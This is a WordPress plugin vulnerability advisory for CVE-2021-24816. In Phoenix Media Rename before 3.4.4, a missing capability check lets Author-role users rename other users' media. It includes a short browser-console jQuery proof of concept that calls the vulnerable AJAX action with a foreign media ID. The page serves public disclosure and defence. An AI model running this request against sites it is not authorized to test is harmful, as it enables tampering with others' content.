Phoenix Media Rename < 3.4.4 – Author Arbitrary Media File Renaming | CVE 2021-24816 | Plugin Vulnerabilities

Description

The plugin does not have capability checks in its phoenix_media_rename AJAX action, which could allow users with Author roles to rename any uploaded media files, including ones they do not own.

Proof of Concept

As an Author, go to the page to edit one of your own Media (ie /wp-admin/post.php?post=1993&action=edit, which contains the _mr_wp_nonce nonce) and run the below in the Web Developer console (564 being the ID of the media the edit, which does not belong to the Author)

jQuery.post(ajaxurl, {
action: 'phoenix_media_rename',
type: "",
_wpnonce: jQuery('#_mr_wp_nonce').attr('value'),
new_filename: "missingauthz",
post_id:564
})

Affects Plugins

phoenix-media-rename

Fixed in 3.4.4

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

5f63d677-20f3-4fe0-bb90-048b6898e6cd

Timeline

Publicly Published

2021-10-06 (about 4 years ago)

Added

2021-10-06 (about 4 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2021-12-23

Title

Protect WP Admin < 3.6.2 - Unauthenticated Plugin Deactivation

Published

2025-02-03

Title

B Slider- Gutenberg Slider Block for WP < 1.1.24 - Authenticated (Contributor+) Private Post Disclosure via bsb-slider Shortcode

Published

2024-03-04

Title

Schema Pro < 2.7.16 - Contributor+ Custom Field Access

Published

2024-02-21

Title

Event Tickets and Registration < 5.8.2 - Missing Authorization

Published

2025-11-14

Title

Qi Blocks < 1.4.4 - Missing Authorization to Arbitrary Attachment Resize